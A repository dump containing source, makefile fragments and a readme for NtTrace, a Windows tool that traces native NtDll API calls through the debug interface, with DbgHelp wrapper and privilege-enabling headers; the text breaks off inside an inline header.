build\DebugDriver.obj build\EntryPoint.obj build\Enumerations.obj build\ShowData.obj \ 66 | build\GetFileNameFromHandle.obj build\GetModuleBase.obj build\SymbolEngine.obj 67 | 68 | build\DebugDriver.obj : \ 69 | "include\displayError.h" \ 70 | "include\displayError.inl" \ 71 | "include\DebugDriver.h" 72 | 73 | build\EntryPoint.obj : \ 74 | "include\displayError.h" \ 75 | "include\displayError.inl" \ 76 | "include\DbgHelper.h" \ 77 | "include\DbgHelper.inl" \ 78 | "include\SymbolEngine.h" \ 79 | "include\TrapNtOpcodes.h" \ 80 | "include\ShowData.h" 81 | 82 | build\ShowData.obj: \ 83 | "include\Enumerations.h" \ 84 | "include\NtDllStruct.h" \ 85 | "include\MsvcExceptions.h" \ 86 | "include\ReadPartialMemory.h" \ 87 | "include\ShowData.h" 88 | 89 | build\GetModuleBase.obj: include\GetModuleBase.h 90 | 91 | build\SymbolEngine.obj: \ 92 | "include/SymbolEngine.h" \ 93 | "include/DbgHelper.h" \ 94 | "include/DbgHelper.inl" \ 95 | "include/StrFromWchar.h" \ 96 | "include/MSvcExceptions.h" \ 97 | "include/BasicType.h" 98 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.rc: -------------------------------------------------------------------------------- 1 | // Resource file for NtTrace 2 | // 3 | // $Id: NtTrace.rc 1440 2014-10-07 23:24:21Z Roger $ 4 | 5 | #define MINOR_VERSION 1439 6 | #define DESCRIPTION "Trace Native API calls made by a process" 7 | #define APPLICATION 8 | 9 | 1 ICON "NtTrace.ico" 10 | 11 | #include "version.rc" 12 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/Readme.txt: -------------------------------------------------------------------------------- 1 | NtTrace readme file 2 | =================== 3 | 4 | Contents 5 | -------- 6 | 7 | Readme.txt - This file 8 | NtTrace.cfg - Configuration file for NtTrace 9 | NtTrace.exe - Built EXE, if you don't want to build it yourself 10 | NtTrace.ico - icon file 11 | NtTrace.mak - make file for Microsoft Visual Studio command prompt 12 | NtTrace.rc - resource file 13 | src - source files 14 | include - include files 15 | version.rc - version resource 16 | dbgCopy.dll - copied and renamed version of DbgHelp.dll from Microsoft "Debugging Tools for windows" 17 | dbgCopy.lib - library mapping DbgHelp calls to dbgCopy instead 18 | 19 | Build instructions 20 | ------------------ 21 | 22 | For Visual Studio versions since VC6: 23 | - start a "Visual Studio command prompt", 24 | - cd to this directory 25 | - run 'nmake /f NtTrace.mak' 26 | 27 | Visual Studio 6 28 | --------------- 29 | 30 | The platform SDK shipped with Visual Studio 6 did not include the Psapi and DbgHelp headers 31 | and libraries used by the program. 32 | 33 | You need to download and install a newer version of the platform SDK, and ensure the include 34 | path has the platform SDK include directory *before* the VC6 ones. 35 | 36 | 64bit builds 37 | ------------ 38 | 39 | The 64bit version of NtTrace builds in the amd64 environment. 40 | 41 | This can be selected using, for example: 42 | "C:\Program Files\Microsoft Visual Studio 10.0\VC\vcvarsall.bat" amd64 43 | 44 | Note: it requires the dbgcopy.lib/.dll from the 64bit ZIP file. 45 | 46 | Note on DbgCopy.dll/lib 47 | ----------------------- 48 | 49 | Windows ships with DbgHelp.dll in the system32 directory. 50 | However, newer versions of this DLL are packaged with "Debugging Tools for Windows" 51 | (See http://www.microsoft.com/whdc/DevTools/Debugging/default.mspx) 52 | 53 | The problem with this mechanism is that the version installed with the OS tends to 54 | take precendence over newer version that may be downloaded. 55 | 56 | My solution is to create a library, dbgCopy.lib, that maps the entry points from DbgHelp.dll 57 | to dbgCopy.dll. The file dbgcopy.dll is simply a renamed copy of the latest DbgHelp.dll but 58 | it can now be placed anywhere on the PATH without conflicting with the OS provided DbgHelp.dll 59 | 60 | Running NtTrace 61 | --------------- 62 | 63 | NtTrace is designed to run from the command line. 64 | 65 | It can be used to execute a program, with arguments if needed. 66 | For example: 67 | NtTrace -filter File cmd 68 | 69 | or to attach to an existing process by PID or, using the -a option, by name. 70 | For example: 71 | NtTrace 1234 72 | or 73 | NtTrace -a notepad 74 | 75 | Run NtTrace -h for a complete list of options. 76 | 77 | How it works 78 | ------------ 79 | 80 | 1. Technology 81 | 82 | NtTrace works by using the Windows debug interface to place breakpoints in NtDll around the native Windows calls into the kernel. 83 | Each time a breakpoint is hit NtTrace reads the arguments pased to/values returned by the associated call. 84 | Note: it does not attempt to trap the native graphics calls that are made to Win32k.sys 85 | 86 | It works on user level and only affects the specific process (and its children). No attempt is made to go into the kernel. 87 | This was a deliberate design decision as it means the tool can be used without requiring adminstrative rights 88 | or permission to install device drivers. 89 | However this also means the tool will not catch: 90 | * kernel calls made by device drivers on behalf of an application 91 | * any direct use of the int 2e or syscall mechanism 92 | 93 | NtTrace also traces into child processes of the initial process started, the -pid option will add the process Id to each output line. 94 | 95 | It also deals with multi-threaded applications (and the -tid option will help identify which thread is making each call). 96 | However note that, since the Windows debug interface is event based, if multiple threads all make calls simultaneously 97 | then the tracing will be serialised. 98 | 99 | 2. Configuration 100 | 101 | The configuration for the native calls is held in NtTrace.cfg and this file is parsed when the program starts up. 102 | Note that different versions of Windows support different sets of calls. 103 | 104 | Some of the Native functions are officially documented by Microsoft but many are undocumented. 105 | The complete list was arrived at by a combination of detective work on the functions and from web sites, such as ReactOS. 106 | 107 | Each function is assigned to a category, and filtering can be done by function name (partial match) and function category. 108 | 109 | By default NtTrace traces on return from the system call, but the -pre option can be used to trace before the call as well. 110 | This can be useful if, for example, the same structure is used for a request and a response buffer. 111 | 112 | -- 113 | $Id: Readme.txt 929 2011-11-05 18:20:24Z Roger $ 114 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/dbgCopy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/dbgCopy.dll -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/dbgCopy.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/dbgCopy.lib -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/AdjustPriv.h: -------------------------------------------------------------------------------- 1 | #ifndef ADJUST_PRIV_H_ 2 | #define ADJUST_PRIV_H_ 3 | 4 | /**@file 5 | 6 | Function to grant a single privilege to a process. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: AdjustPriv.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | namespace or2 30 | { 31 | 32 | /** 33 | * Attempt to grant the named privilege to the specified process. 34 | * 35 | * @return 36 | * - TRUE - success 37 | * - FALSE - failure [typically the process hasn't been granted the privilege] 38 | */ 39 | 40 | BOOL 41 | inline 42 | EnableNamedPriv ( 43 | LPCTSTR lpName, ///< name for the privilege token (from winnt.h) 44 | HANDLE hProcess = GetCurrentProcess() ///< handle of the process to which to give the privilege 45 | ) 46 | { 47 | HANDLE hToken; 48 | LUID privValue; 49 | TOKEN_PRIVILEGES tkp; 50 | 51 | 52 | // 53 | // Retrieve a handle of the access token 54 | // 55 | if (!OpenProcessToken( hProcess, 56 | TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, 57 | &hToken)) 58 | { 59 | std::cerr << "OpenProcessToken failed with: " << ::GetLastError() << std::endl; 60 | return FALSE; 61 | } 62 | 63 | if (!LookupPrivilegeValue((LPSTR) NULL, 64 | lpName, 65 | &privValue)) 66 | { 67 | std::cerr << "LookupPrivilegeValue failed with: " << GetLastError() << std::endl; 68 | return FALSE; 69 | } 70 | 71 | // 72 | // Enable the privilege 73 | // 74 | tkp.PrivilegeCount = 1; 75 | tkp.Privileges[0].Luid = privValue; 76 | tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 77 | 78 | AdjustTokenPrivileges(hToken, 79 | FALSE, 80 | &tkp, 81 | sizeof(TOKEN_PRIVILEGES), 82 | (PTOKEN_PRIVILEGES) NULL, 83 | (PDWORD) NULL); 84 | 85 | // 86 | // The return value of AdjustTokenPrivileges couldn't be tested on older NT versions 87 | // 88 | DWORD lastError = GetLastError(); 89 | if ( lastError != ERROR_SUCCESS) 90 | { 91 | if ( lastError == ERROR_NOT_ALL_ASSIGNED ) 92 | { 93 | // Can't enable permission we haven't got 94 | } 95 | else 96 | { 97 | std::cerr << "AdjustTokenPrivileges failed with: " << lastError << std::endl; 98 | } 99 | return FALSE; 100 | } 101 | 102 | return TRUE; 103 | } 104 | 105 | } 106 | 107 | #endif // ADJUST_PRIV_H_ 108 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/BasicType.h: -------------------------------------------------------------------------------- 1 | #ifndef BASICTYPE_H_ 2 | #define BASICTYPE_H_ 3 | 4 | /** Enumerations extracted from CvConst.h in "Visual Studio SDKs\DIA SDK" */ 5 | 6 | // $Id: BasicType.h 383 2008-06-12 23:00:22Z Roger $ 7 | 8 | 9 | /** Enumeration for function call type */ 10 | typedef enum CV_call_e { 11 | CV_CALL_NEAR_C = 0x00, // near right to left push, caller pops stack 12 | CV_CALL_FAR_C = 0x01, // far right to left push, caller pops stack 13 | CV_CALL_NEAR_PASCAL = 0x02, // near left to right push, callee pops stack 14 | CV_CALL_FAR_PASCAL = 0x03, // far left to right push, callee pops stack 15 | CV_CALL_NEAR_FAST = 0x04, // near left to right push with regs, callee pops stack 16 | CV_CALL_FAR_FAST = 0x05, // far left to right push with regs, callee pops stack 17 | CV_CALL_SKIPPED = 0x06, // skipped (unused) call index 18 | CV_CALL_NEAR_STD = 0x07, // near standard call 19 | CV_CALL_FAR_STD = 0x08, // far standard call 20 | CV_CALL_NEAR_SYS = 0x09, // near sys call 21 | CV_CALL_FAR_SYS = 0x0a, // far sys call 22 | CV_CALL_THISCALL = 0x0b, // this call (this passed in register) 23 | CV_CALL_MIPSCALL = 0x0c, // Mips call 24 | CV_CALL_GENERIC = 0x0d, // Generic call sequence 25 | CV_CALL_ALPHACALL = 0x0e, // Alpha call 26 | CV_CALL_PPCCALL = 0x0f, // PPC call 27 | CV_CALL_SHCALL = 0x10, // Hitachi SuperH call 28 | CV_CALL_ARMCALL = 0x11, // ARM call 29 | CV_CALL_AM33CALL = 0x12, // AM33 call 30 | CV_CALL_TRICALL = 0x13, // TriCore Call 31 | CV_CALL_SH5CALL = 0x14, // Hitachi SuperH-5 call 32 | CV_CALL_M32RCALL = 0x15, // M32R Call 33 | CV_CALL_CLRCALL = 0x16, // clr call 34 | CV_CALL_RESERVED = 0x17 // first unused call enumeration 35 | 36 | // Do NOT add any more machine specific conventions. This is to be used for 37 | // calling conventions in the source only (e.g. __cdecl, __stdcall). 38 | } CV_call_e; 39 | 40 | /** TI_GET_DATAKIND values */ 41 | enum DataKind 42 | { 43 | DataIsUnknown, 44 | DataIsLocal, 45 | DataIsStaticLocal, 46 | DataIsParam, 47 | DataIsObjectPtr, 48 | DataIsFileStatic, 49 | DataIsGlobal, 50 | DataIsMember, 51 | DataIsStaticMember, 52 | DataIsConstant 53 | }; 54 | 55 | /** Basic types */ 56 | enum BasicType 57 | { 58 | btNoType = 0, 59 | btVoid = 1, 60 | btChar = 2, 61 | btWChar = 3, 62 | btInt = 6, 63 | btUInt = 7, 64 | btFloat = 8, 65 | btBCD = 9, 66 | btBool = 10, 67 | btLong = 13, 68 | btULong = 14, 69 | btCurrency = 25, 70 | btDate = 26, 71 | btVariant = 27, 72 | btComplex = 28, 73 | btBit = 29, 74 | btBSTR = 30, 75 | btHresult = 31 76 | }; 77 | 78 | #endif // BASICTYPE_H_ 79 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DbgHelper.h: -------------------------------------------------------------------------------- 1 | #ifndef DBGHELPER_H_ 2 | #define DBGHELPER_H_ 3 | 4 | /** 5 | @file 6 | Helper for wrapping calls to the Microsoft DbgHelp.dll. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: DbgHelper.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #include 30 | 31 | #include "SymTagEnum.h" 32 | 33 | #if(WINVER < 0x0500) 34 | // Check for original VC6 SDK 35 | #error "Windows 2000 or higher platform SDK required" 36 | #endif 37 | 38 | #include 39 | 40 | // If we use imagehlp.lib then 41 | // (A) we must copy the imagehlp.dll to the location of the exe on NT 4.0 42 | // (B) because dbghelp.dll is loaded dynamically it will always be loaded from WntNt\System32 43 | // on Windows 2000 and so you can't use the later versions from "Debugging Tools for Windows". 44 | // 45 | // If we use dbgHelp.lib we tend to get the one in WINNT\SYSTEM32 46 | // So I use a 'copy': dbgCopy.lib which links to dbgCopy.dll, which in turn 47 | // is just a copy and rename of the latest dbgHelp.dll 48 | 49 | #pragma comment( lib, "dbgCopy.lib" ) 50 | 51 | #include 52 | 53 | #ifdef SSRVOPT_TRACE // identifies newer DbgHelp.h (!) 54 | #define DBGHELP_6_1_APIS 55 | #endif 56 | 57 | #ifdef DBGHELP_6_1_APIS 58 | 59 | /** Helper for streaming SymTagEnum values */ 60 | std::ostream& operator<<( std::ostream& os, enum SymTagEnum const value ); 61 | 62 | #endif // DBGHELP_6_1_APIS 63 | 64 | namespace or2 65 | { 66 | 67 | /** Class to assist with DbgHelp API */ 68 | class DbgHelper 69 | { 70 | public: 71 | /** Construct a helper object. */ 72 | DbgHelper(); 73 | 74 | /** Destroy and clean up. */ 75 | virtual ~DbgHelper(); 76 | 77 | /** Initalise the object to access the specified process. */ 78 | BOOL Initialise( HANDLE hProcess ); 79 | 80 | /** Clean up data structures for the current process. */ 81 | BOOL Cleanup(); 82 | 83 | /** Get module information for the input address. */ 84 | BOOL GetModuleInfo64( DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo ) const; 85 | 86 | /** Load the module base information for the input address. */ 87 | DWORD64 GetModuleBase64( DWORD64 dwAddr ) const; 88 | 89 | /** Load information for a module. */ 90 | BOOL LoadModule64( HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll ) const; 91 | 92 | /** Unload information for a module */ 93 | BOOL UnloadModule64( DWORD64 BaseOfDll ); 94 | 95 | /** Get line number information for the input address. */ 96 | BOOL GetLineFromAddr64( DWORD64 dwAddr, PDWORD pdwDisplacement, PIMAGEHLP_LINE64 Line ) const; 97 | 98 | /** Get the process currently being debugged. */ 99 | HANDLE GetProcess() const; 100 | 101 | #ifndef DBGHELP_6_1_APIS 102 | 103 | /** Get symbolic information for the input address. */ 104 | BOOL GetSymFromAddr64( DWORD dwAddr, PDWORD64 pdwDisplacement, PIMAGEHLP_SYMBOL64 Symbol ) const; 105 | 106 | #else 107 | 108 | // Version 6.1 APIs 109 | 110 | /** Get symbol for specific address. */ 111 | BOOL SymFromAddr( DWORD64 Address, PDWORD64 Displacement, PSYMBOL_INFO Symbol ) const; 112 | 113 | /** Get symbol for a name */ 114 | BOOL SymFromName( PCSTR Name, PSYMBOL_INFO Symbol ) const; 115 | 116 | /** Get type info from a type ID. */ 117 | BOOL GetTypeInfo( DWORD64 ModBase, ULONG TypeId, IMAGEHLP_SYMBOL_TYPE_INFO GetType, PVOID pInfo ) const; 118 | 119 | /** Get type info from a name. */ 120 | BOOL GetTypeFromName( ULONG64 BaseOfDll, PCTSTR Name, PSYMBOL_INFO Symbol ) const; 121 | 122 | /** The SetContext function sets context information used by the SymEnumSymbols function. */ 123 | BOOL SetContext( PIMAGEHLP_STACK_FRAME StackFrame, PIMAGEHLP_CONTEXT Context ) const; 124 | 125 | /** The EnumSymbols function enumerates all symbols in a process. */ 126 | BOOL EnumSymbols( ULONG64 BaseOfDll, PCSTR Mask, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const; 127 | 128 | /** The EnumTypes function enumerates all types in a process. */ 129 | BOOL EnumTypes( ULONG64 BaseOfDll, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const; 130 | 131 | /** Test whether EnumSymbols API is available. */ 132 | BOOL IsEnumSymbolsAvailable() const; 133 | 134 | /** Write a mini-dump */ 135 | BOOL WriteMiniDump( DWORD processId, HANDLE hFile, MINIDUMP_TYPE DumpType, 136 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, PMINIDUMP_CALLBACK_INFORMATION CallbackParam ); 137 | 138 | #endif // DBGHELP_6_1_APIS 139 | 140 | private: 141 | // suppress copy and assign 142 | DbgHelper( DbgHelper const & ); 143 | DbgHelper& operator=( DbgHelper const & ); 144 | 145 | HANDLE m_hProcess; // Current process being debugged 146 | }; 147 | 148 | /** Helper struct to zero initialise POD classes */ 149 | template 150 | struct DbgInit : public T 151 | { 152 | /** Constructor sets the base class to zeroes */ 153 | DbgInit() 154 | { 155 | ::memset( static_cast(this), 0, sizeof( T ) ); 156 | SizeOfStruct = sizeof( T ); 157 | } 158 | }; 159 | 160 | } 161 | 162 | // inline implementation 163 | #include "DbgHelper.inl" 164 | 165 | #endif // DBGHELPER_H_ 166 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DbgHelper.inl: -------------------------------------------------------------------------------- 1 | #ifndef DBGHELPER_INL_ 2 | #define DBGHELPER_INL_ 3 | 4 | /* 5 | Provide helper functions for DbgHelp DLL. 6 | 7 | @author Roger Orr 8 | 9 | Copyright © 2003. 10 | This software is distributed in the hope that it will be useful, but 11 | without WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 13 | 14 | Permission is granted to anyone to make or distribute verbatim 15 | copies of this software provided that the copyright notice and 16 | this permission notice are preserved, and that the distributor 17 | grants the recipient permission for further distribution as permitted 18 | by this notice. 19 | 20 | Comments and suggestions are always welcome. 21 | Please report bugs to rogero@howzatt.demon.co.uk. 22 | 23 | $Revision: 1405 $ 24 | */ 25 | 26 | // $Id: DbgHelper.inl 1405 2013-11-12 23:57:17Z Roger $ 27 | 28 | #include 29 | 30 | #ifdef DBGHELP_6_1_APIS 31 | 32 | #define DBGCOPY_DLL "dbgCopy" // Use a copy of dbgHelp.dll to avoid DLL hell 33 | 34 | /** Helper for streaming SymTagEnum values */ 35 | inline 36 | std::ostream& operator<<( std::ostream& os, enum SymTagEnum const value ) 37 | { 38 | #define DEF(X) { X, #X } 39 | 40 | static struct 41 | { 42 | int value; 43 | char const * name; 44 | } enumValues[] = 45 | { 46 | DEF(SymTagNull), 47 | DEF(SymTagExe), 48 | DEF(SymTagCompiland), 49 | DEF(SymTagCompilandDetails), 50 | DEF(SymTagCompilandEnv), 51 | DEF(SymTagFunction), 52 | DEF(SymTagBlock), 53 | DEF(SymTagData), 54 | DEF(SymTagAnnotation), 55 | DEF(SymTagLabel), 56 | DEF(SymTagPublicSymbol), 57 | DEF(SymTagUDT), 58 | DEF(SymTagEnum), 59 | DEF(SymTagFunctionType), 60 | DEF(SymTagPointerType), 61 | DEF(SymTagArrayType), 62 | DEF(SymTagBaseType), 63 | DEF(SymTagTypedef), 64 | DEF(SymTagBaseClass), 65 | DEF(SymTagFriend), 66 | DEF(SymTagFunctionArgType), 67 | DEF(SymTagFuncDebugStart), 68 | DEF(SymTagFuncDebugEnd), 69 | DEF(SymTagUsingNamespace), 70 | DEF(SymTagVTableShape), 71 | DEF(SymTagVTable), 72 | DEF(SymTagCustom), 73 | DEF(SymTagThunk), 74 | DEF(SymTagCustomType), 75 | DEF(SymTagManagedType), 76 | DEF(SymTagDimension), 77 | DEF(SymTagMax), 78 | { 0,0 }}; 79 | 80 | #undef DEF 81 | 82 | for ( int idx = 0; enumValues[idx].name != 0; ++idx ) 83 | { 84 | if ( enumValues[idx].value == value ) 85 | { 86 | return os << enumValues[idx].name; 87 | } 88 | } 89 | 90 | return os << value; 91 | } 92 | 93 | #endif // DBGHELP_6_1_APIS 94 | 95 | namespace or2 96 | { 97 | 98 | /** Constructor */ 99 | inline 100 | DbgHelper::DbgHelper() 101 | : m_hProcess(0) 102 | {} 103 | 104 | /** Destructor */ 105 | inline 106 | DbgHelper::~DbgHelper() 107 | { 108 | Cleanup(); 109 | } 110 | 111 | /** Initialise (only called once) */ 112 | inline 113 | BOOL DbgHelper::Initialise( HANDLE hProcess ) 114 | { 115 | BOOL bRet = ::SymInitialize( hProcess, 0, false ); 116 | if ( bRet ) 117 | { 118 | m_hProcess = hProcess; 119 | } 120 | return bRet; 121 | } 122 | 123 | /** Clean up */ 124 | inline 125 | BOOL DbgHelper::Cleanup() 126 | { 127 | BOOL bRet = false; 128 | if ( m_hProcess ) 129 | { 130 | bRet = ::SymCleanup( m_hProcess ); 131 | m_hProcess = 0; 132 | } 133 | 134 | return bRet; 135 | } 136 | 137 | inline 138 | BOOL DbgHelper::GetModuleInfo64( DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo ) const 139 | { 140 | return ::SymGetModuleInfo64( m_hProcess, dwAddr, ModuleInfo ); 141 | } 142 | 143 | inline 144 | DWORD64 DbgHelper::GetModuleBase64( DWORD64 dwAddr ) const 145 | { 146 | return ::SymGetModuleBase64( m_hProcess, dwAddr ) ; 147 | } 148 | 149 | inline 150 | BOOL DbgHelper::LoadModule64( HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll ) const 151 | { 152 | // Use const_cast to support older dbghelp.h header files which aren't as const correct. 153 | return ::SymLoadModule64( m_hProcess, hFile, const_cast(ImageName), const_cast(ModuleName), BaseOfDll, SizeOfDll ) != 0; 154 | } 155 | 156 | inline 157 | BOOL DbgHelper::UnloadModule64( DWORD64 BaseOfDll ) 158 | { 159 | return SymUnloadModule64( m_hProcess, BaseOfDll ); 160 | } 161 | 162 | inline 163 | BOOL DbgHelper::GetLineFromAddr64( DWORD64 dwAddr, PDWORD pdwDisplacement, PIMAGEHLP_LINE64 Line ) const 164 | { 165 | return ::SymGetLineFromAddr64( m_hProcess, dwAddr, pdwDisplacement, Line ); 166 | } 167 | 168 | inline 169 | HANDLE DbgHelper::GetProcess() const 170 | { 171 | return m_hProcess; 172 | } 173 | 174 | #ifndef DBGHELP_6_1_APIS 175 | 176 | inline 177 | BOOL DbgHelper::GetSymFromAddr64( DWORD dwAddr, PDWORD64 pdwDisplacement, PIMAGEHLP_SYMBOL64 Symbol ) const 178 | { 179 | return ::SymGetSymFromAddr64( m_hProcess, dwAddr, pdwDisplacement, Symbol ); 180 | } 181 | 182 | #else 183 | 184 | // Version 6.1 APIs 185 | 186 | #define DYN_LOAD( SYMBOL ) static SYMBOL *pfn##SYMBOL = \ 187 | (SYMBOL*) ::GetProcAddress( ::GetModuleHandle( DBGCOPY_DLL ), #SYMBOL ); 188 | 189 | /** Get symbol for specific address */ 190 | inline 191 | BOOL DbgHelper::SymFromAddr( DWORD64 Address, PDWORD64 Displacement, PSYMBOL_INFO Symbol ) const 192 | { 193 | typedef 194 | BOOL 195 | IMAGEAPI 196 | SymFromAddr( 197 | IN HANDLE hProcess, 198 | IN DWORD64 Address, 199 | OUT PDWORD64 Displacement, 200 | IN OUT PSYMBOL_INFO Symbol 201 | ); 202 | 203 | DYN_LOAD( SymFromAddr ); 204 | 205 | BOOL bRet = false; 206 | 207 | if ( pfnSymFromAddr ) 208 | { 209 | bRet = pfnSymFromAddr( m_hProcess, Address, Displacement, Symbol ); 210 | // Displacement is incorrect for some PDB files (linker optimization?) 211 | if ( bRet && Displacement && Symbol && Symbol->Address ) 212 | { 213 | *Displacement = Address - Symbol->Address; 214 | } 215 | } 216 | 217 | return bRet; 218 | } 219 | 220 | /** Get symbol for name */ 221 | inline 222 | BOOL DbgHelper::SymFromName( PCSTR Name, PSYMBOL_INFO Symbol ) const 223 | { 224 | typedef 225 | BOOL 226 | IMAGEAPI 227 | SymFromName( 228 | IN HANDLE hProcess, 229 | IN PCSTR Name, 230 | IN OUT PSYMBOL_INFO Symbol 231 | ); 232 | 233 | DYN_LOAD( SymFromName ); 234 | 235 | BOOL bRet = false; 236 | 237 | if ( pfnSymFromName ) 238 | { 239 | bRet = pfnSymFromName( m_hProcess, Name, Symbol ); 240 | } 241 | 242 | return bRet; 243 | } 244 | 245 | /** Get type info from a type ID */ 246 | inline 247 | BOOL DbgHelper::GetTypeInfo( DWORD64 ModBase, ULONG TypeId, IMAGEHLP_SYMBOL_TYPE_INFO GetType, PVOID pInfo ) const 248 | { 249 | typedef 250 | BOOL 251 | IMAGEAPI 252 | SymGetTypeInfo( 253 | IN HANDLE hProcess, 254 | IN DWORD64 ModBase, 255 | IN ULONG TypeId, 256 | IN IMAGEHLP_SYMBOL_TYPE_INFO GetType, 257 | OUT PVOID pInfo 258 | ); 259 | 260 | DYN_LOAD( SymGetTypeInfo ); 261 | 262 | BOOL bRet = false; 263 | 264 | if ( pfnSymGetTypeInfo ) 265 | { 266 | bRet = pfnSymGetTypeInfo( m_hProcess, ModBase, TypeId, GetType, pInfo ); 267 | } 268 | 269 | return bRet; 270 | } 271 | 272 | /** Get type info from a name. */ 273 | inline 274 | BOOL DbgHelper::GetTypeFromName( DWORD64 ModBase, PCTSTR Name, PSYMBOL_INFO Symbol ) const 275 | { 276 | typedef 277 | BOOL 278 | IMAGEAPI 279 | SymGetTypeFromName( 280 | IN HANDLE hProcess, 281 | IN DWORD64 ModBase, 282 | IN PCTSTR Name, 283 | IN PSYMBOL_INFO Symbol 284 | ); 285 | 286 | DYN_LOAD( SymGetTypeFromName ); 287 | 288 | BOOL bRet = false; 289 | 290 | if ( pfnSymGetTypeFromName ) 291 | { 292 | bRet = pfnSymGetTypeFromName( m_hProcess, ModBase, Name, Symbol ); 293 | } 294 | 295 | return bRet; 296 | } 297 | 298 | 299 | /** The SetContext function sets context information used by the SymEnumSymbols function. */ 300 | inline 301 | BOOL DbgHelper::SetContext( PIMAGEHLP_STACK_FRAME StackFrame, PIMAGEHLP_CONTEXT Context ) const 302 | { 303 | typedef 304 | BOOL 305 | IMAGEAPI 306 | SymSetContext( 307 | HANDLE hProcess, 308 | PIMAGEHLP_STACK_FRAME StackFrame, 309 | PIMAGEHLP_CONTEXT Context 310 | ); 311 | 312 | DYN_LOAD( SymSetContext ); 313 | 314 | BOOL bRet = false; 315 | 316 | if ( pfnSymSetContext ) 317 | { 318 | bRet = pfnSymSetContext( m_hProcess, StackFrame, Context ); 319 | } 320 | 321 | return bRet; 322 | } 323 | 324 | /** The EnumSymbols function enumerates all symbols in a process. */ 325 | inline 326 | BOOL DbgHelper::EnumSymbols( ULONG64 BaseOfDll, PCSTR Mask, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const 327 | { 328 | typedef 329 | BOOL 330 | IMAGEAPI 331 | SymEnumSymbols( 332 | HANDLE hProcess, 333 | ULONG64 BaseOfDll, 334 | PCSTR Mask, 335 | PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, 336 | PVOID UserContext 337 | ); 338 | 339 | DYN_LOAD( SymEnumSymbols ); 340 | 341 | BOOL bRet = false; 342 | 343 | if ( pfnSymEnumSymbols ) 344 | { 345 | bRet = pfnSymEnumSymbols( m_hProcess, BaseOfDll, Mask, EnumSymbolsCallback, UserContext ); 346 | } 347 | 348 | return bRet; 349 | } 350 | 351 | /** The EnumTypes function enumerates all types in a process. */ 352 | inline 353 | BOOL DbgHelper::EnumTypes( ULONG64 BaseOfDll, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const 354 | { 355 | typedef 356 | BOOL 357 | IMAGEAPI 358 | SymEnumTypes( 359 | HANDLE hProcess, 360 | ULONG64 BaseOfDll, 361 | PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, 362 | PVOID UserContext 363 | ); 364 | 365 | DYN_LOAD( SymEnumTypes ); 366 | 367 | BOOL bRet = false; 368 | 369 | if ( pfnSymEnumTypes ) 370 | { 371 | bRet = pfnSymEnumTypes( m_hProcess, BaseOfDll, EnumSymbolsCallback, UserContext ); 372 | } 373 | 374 | return bRet; 375 | } 376 | 377 | /* Write a mini-dump */ 378 | inline 379 | BOOL DbgHelper::WriteMiniDump( DWORD processId, HANDLE hFile, 380 | MINIDUMP_TYPE DumpType, 381 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 382 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 383 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 384 | ) 385 | { 386 | typedef 387 | BOOL 388 | WINAPI 389 | MiniDumpWriteDump( 390 | IN HANDLE hProcess, 391 | 